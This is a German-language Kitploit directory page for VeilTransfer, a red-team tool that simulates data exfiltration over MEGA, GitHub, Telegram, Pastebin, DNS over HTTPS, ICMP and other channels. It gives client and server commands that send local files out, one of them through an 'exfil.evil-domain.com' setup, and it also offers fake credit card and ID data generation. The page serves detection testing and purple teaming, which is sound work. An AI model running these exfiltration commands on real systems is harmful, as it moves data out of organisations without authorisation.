Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
VeilTransfer — VeilTransfer ist ein Daten-Exfiltrationstool, das dazu entwickelt wurde, die Erkennungsfähigkeiten zu testen und zu verbessern. Dieses Tool simuliert reale Daten-Exfiltrationstechniken, die von fortschrittlichen Bedrohungsakteuren verwendet werden, und ermöglicht es Organisationen, ihre Sicherheitslage zu bewerten und zu verbessern. | Kitploit
Tools/GitHubGitHub/infosecn1nja/veiltransfer
DatenexfiltrationNetzwerksicherheitPenetrationstestsRed Teaming
GitHubinfosecn1nja/veiltransfer

VeilTransfer

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

VeilTransfer ist ein Daten-Exfiltrationstool, das dazu entwickelt wurde, die Erkennungsfähigkeiten zu testen und zu verbessern. Dieses Tool simuliert reale Daten-Exfiltrationstechniken, die von fortschrittlichen Bedrohungsakteuren verwendet werden, und ermöglicht es Organisationen, ihre Sicherheitslage zu bewerten und zu verbessern.

157223vor 8 MonatenVon Kitploit geprüft
Teilen

VeilTransfer 2.0

VeilTransfer ist ein Datenerfiltrations-Tool, das entwickelt wurde, um Erkennungsfähigkeiten zu testen und zu verbessern. Dieses Tool simuliert reale Datenerfiltrations-Techniken, die von fortgeschrittenen Bedrohungsakteuren verwendet werden, und ermöglicht es Organisationen, ihre Sicherheitslage zu bewerten und zu verbessern. Durch die Nutzung mehrerer Exfiltrationsmethoden wie MEGA, GitHub, SFTP, WebDAV und mehr hilft VeilTransfer dabei, Lücken in Ihren Abwehrmaßnahmen zu identifizieren und stellt sicher, dass Ihre Sicherheitslösungen darauf vorbereitet sind, modernen Datenschutzverletzungen entgegenzuwirken.

Unterstützte Exfiltrationsmethoden

  • MEGA
  • GitHub
  • Dropbox
  • Telegram
  • Pastebin
  • WebDAV
  • Webhook
  • SFTP
  • FTP
  • DoH (DNS over HTTPS)
  • QUIC
  • ICMP

MITRE ATT&CK-Zuordnung

IDTechniken
T1029Geplante Übertragung
T1020Automatisierte Exfiltration
T1132.001Datenkodierung: Standardkodierung
T1560.002Gesammelte Daten archivieren: Archivierung über Bibliothek
T1567.001Exfiltration über Webdienst: Exfiltration in Code-Repository
T1567.002Exfiltration über Webdienst: Exfiltration in Cloud-Speicher
T1567.003Exfiltration über Webdienst: Exfiltration in Textspeicher
T1567.004Exfiltration über Webdienst: Exfiltration über Webhook
T1048.003Exfiltration über alternatives Protokoll: Exfiltration über unverschlüsseltes Nicht-C2-Protokoll
T1048.002Exfiltration über alternatives Protokoll: Exfiltration über asymmetrisch verschlüsseltes Nicht-C2-Protokoll

Zusätzliche Funktionen

Erzeugung von Fake-Daten

VeilTransfer unterstützt auch die Erzeugung von Fake-Daten, einschließlich:

  • Indonesia Identity Card (KTP)-Nummern: Generieren Sie realistische KTP-Nummern und zugehörige Daten.
  • Kreditkarteninformationen: Erstellen Sie gefälschte Kreditkartendaten im PCI-DSS-Format, einschließlich Vorname, Nachname, CCN (Visa/MasterCard/AMEX) und Ablaufdatum.
  • Social Security Numbers (SSN): Generieren Sie gefälschte SSNs für die Verwendung in Simulationen und Testumgebungen.
  • Krankenakten: Generieren Sie gefälschte Krankenaktdaten auf Indonesisch (id) oder Englisch (en).

Erstellung von Zip-Daten

Erstellen Sie einfach Zip-Dateien zum Bündeln und Komprimieren von Daten, die dann für die Exfiltration oder zum Testen verschiedener Szenarien verwendet werden können. Unterstützt optional die Aufteilung in mehrere Dateien basierend auf der Größe.

Beispielhafte Anwendungsfälle

  • Red-Team-Operationen: Setzen Sie VeilTransfer während Red-Team-Übungen ein, um Blue Teams mit anspruchsvollen und realistischen Exfiltrationsszenarien herauszufordern.
  • Purple Teaming: Arbeiten Sie mit Ihren Verteidigungsteams zusammen, um Exfiltrationsversuche zu simulieren und anschließend zu erkennen, und verfeinern Sie sowohl offensive als auch defensive Taktiken.
  • Sicherheitstests: Verwenden Sie VeilTransfer, um die Wirksamkeit von DLP, NDR, Firewalls und anderen Netzwerksicherheitsmaßnahmen zu validieren.

Beispielhafte Verwendung

Übertragung

Übertragen einer Datei über SFTP

Dieses Beispiel zeigt, wie eine Datei mithilfe des SFTP-Protokolls sicher an einen entfernten Server übertragen wird. Die Datei befindet sich auf dem lokalen Rechner und wird mithilfe der SSH-Authentifizierung in das angegebene entfernte Verzeichnis übertragen.

root@kitploit:~
veiltransfer_client transfer sftp -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server example.com:22 -username user -password pass

Übertragen von Dateien an einen WebDAV-Server

In diesem Beispiel werden Dateien aus einem lokalen Verzeichnis auf einen WebDAV-Server hochgeladen. Der Server erfordert für die Authentifizierung einen Benutzernamen und ein Passwort. Der Serverparameter enthält das URI-Schema (https:// oder http://).

root@kitploit:~
veiltransfer_client transfer webdav -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server http://webdav.example.com:8080 -username user -password pass

Übertragen von Dateien an Mega Cloud

Dieses Beispiel zeigt, wie Dateien an den Mega-Cloud-Speicher übertragen werden. Die Dateien werden aus einem angegebenen lokalen Verzeichnis hochgeladen, und die Authentifizierung erfolgt über die Mega-Cloud-Anmeldedaten des Benutzers.

root@kitploit:~
veiltransfer_client transfer mega -localPath (/path/to/file or /path/to/directory) -username [email protected] -password megasecretpassword

Übertragen von Dateien über FTP

In diesem Beispiel wird eine Datei auf einen FTP-Server hochgeladen. Die Datei wird in ein bestimmtes Verzeichnis auf dem entfernten Server übertragen. Der Server erfordert für die Authentifizierung einen Benutzernamen und ein Passwort.

root@kitploit:~
veiltransfer_client transfer ftp -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server ftp.example.com:21 -username ftpuser -password ftppassword

Hochladen einer Datei auf Pastebin

Dieses Beispiel zeigt, wie der Inhalt einer Datei auf Pastebin hochgeladen wird. Der Inhalt wird mithilfe eines vom Benutzer bereitgestellten API-Schlüssels auf Pastebin veröffentlicht.

root@kitploit:~
veiltransfer_client transfer pastebin -localPath (/path/to/file or /path/to/directory) -apiKey your_pastebin_api_key

Senden einer Datei an ein GitHub-Repository

Dieses Beispiel zeigt, wie eine Datei vom lokalen Rechner in ein bestimmtes GitHub-Repository übertragen wird. Die Datei wird mithilfe des GitHub-API-Tokens des Benutzers zur Authentifizierung zum Repository hinzugefügt.

root@kitploit:~
veiltransfer_client transfer github -localPath (/path/to/file or /path/to/directory) -repo yourusername/repository -apiKey your_github_api_token

Senden einer Datei an einen Telegram-Kanal

Dieses Beispiel zeigt, wie eine Datei an einen bestimmten Telegram-Kanal gesendet wird. Die Datei wird mithilfe eines Telegram-Bot-API-Tokens gesendet, und die Nachricht wird an die angegebene Kanal-ID zugestellt.

root@kitploit:~
veiltransfer_client transfer telegram -localPath (/path/to/file or /path/to/directory) -telegramAPI your_telegram_bot_api_token -channelID 123456789

Senden von Daten an eine Webhook-URL

In diesem Beispiel wird der Inhalt einer Datei an eine angegebene Webhook-URL gesendet.

root@kitploit:~
veiltransfer_client transfer webhook -localPath (/path/to/file or /path/to/directory) -webhookURL https://webhook.site/your-webhook-url

Übertragen von Dateien über DoH (DNS over HTTPS)

Um einen sicheren Datenerfiltrationsmechanismus mithilfe von DNS over HTTPS (DoH) einzurichten, müssen die folgenden DNS-Einträge konfiguriert werden:

  1. A-Eintrag: Zeigen Sie test auf die IP-Adresse <VeilTransfer_IP_Address>.

    test -> <VeilTransfer_IP_Address>

  2. NS-Eintrag: Definieren Sie eine Subdomain (exfil), die von evil-domain.com verwaltet wird.

    exfil -> test.evil-domain.com

Die Domäne exfil.evil-domain.com dient als DNS-Exfil-Domäne.

Starten Sie dann den VeilTransfer-Server im DoH-Modus mit dem folgenden Befehl:

root@kitploit:~
veiltransfer_server doh -key ag36rjsg284nfk2g -folder /root/data/exfil

Hinweis: Der Verschlüsselungsschlüssel (-key) muss 16 oder 32 Zeichen lang sein.

Um Dateien über DoH hochzuladen, stellen Sie sicher, dass der VeilTransfer-Server mit einem gültigen Verschlüsselungsschlüssel aktiv im DoH-Modus läuft. Starten Sie dann die Übertragung mit dem Client-Befehl:

root@kitploit:~
veiltransfer_client transfer doh -localPath /path/to/file_or_directory -key ag36rjsg284nfk2g -dnsServer exfil.evil-domain.com

Übertragen von Dateien über QUIC

Um den VeilTransfer-Server im QUIC-Modus zu starten, verwenden Sie den folgenden Befehl:

root@kitploit:~
veiltransfer_server quic -cert /path/server.crt -key /path/server.key

Sobald der Server läuft, können Sie Dateien oder Verzeichnisse hochladen mit:

root@kitploit:~
veiltransfer_client transfer quic -localPath (/path/to/file or /path/to/directory) -server example.com:443

Übertragen von Dateien über ICMP

Um Dateiübertragungen über das ICMP-Protokoll zu ermöglichen, starten Sie den VeilTransfer-Server im ICMP-Modus, indem Sie den folgenden Befehl ausführen:

root@kitploit:~
veiltransfer_server_linux icmp -folder /path/folder

Sobald der Server aktiv ist, führen Sie den folgenden Befehl aus, um Dateien oder Verzeichnisse über ICMP zu übertragen:

root@kitploit:~
veiltransfer_client_linux transfer icmp -localPath (/path/to/file or /path/to/directory) -server <ip address>

Zip-Dateien erstellen

Erstellen einer einfachen Zip-Datei

Erstellt ein Zip-Archiv aus einem angegebenen Verzeichnis.

root@kitploit:~
veiltransfer_client create-zip -localPath /path/to/directory -outputPath /path/to/output.zip

Erstellen einer aufgeteilten Zip-Datei

Erstellt ein Zip-Archiv, das basierend auf der angegebenen Größe in mehrere Teile aufgeteilt wird.

root@kitploit:~
veiltransfer_client create-zip -localPath /path/to/directory -outputPath /path/to/output.zip -splitSize 1000000

Datengenerator

Generieren von 100 gefälschten Kreditkartennummern

Dieses Beispiel zeigt, wie 100 Einträge gefälschter Kreditkartendaten generiert werden. Die generierten Daten enthalten Kreditkartennummern, Ablaufdaten und zugehörige Details.

root@kitploit:~
veiltransfer_client generate-fake -ccn -count 100

Generieren von 50 gefälschten indonesischen KTP-Einträgen

Dieses Beispiel zeigt, wie 50 Einträge gefälschter KTP-Daten generiert werden, bei denen es sich um indonesische Personalausweise handelt. Die Daten enthalten persönliche Informationen wie Name, Adresse und KTP-Nummer.

root@kitploit:~
veiltransfer_client generate-fake -ktp -count 50

Generieren von 200 gefälschten Social Security Numbers

Die generierten Daten enthalten Social Security Numbers, die nach US-amerikanischen Standards formatiert sind.

root@kitploit:~
veiltransfer_client generate-fake -ssn -count 200

Generieren von 300 gefälschten Krankenakten auf Englisch

Dieses Beispiel zeigt, wie 300 gefälschte Krankenakten auf Englisch generiert werden.

root@kitploit:~
veiltransfer_client generate-fake -medical-record -count 300 -language en

Mitwirken

Beiträge zu VeilTransfer sind willkommen! Wenn Sie Ideen für neue Funktionen, Exfiltrationsmethoden oder Verbesserungen haben, reichen Sie bitte einen Pull-Request ein oder eröffnen Sie ein Issue auf GitHub.

Tool herunterladen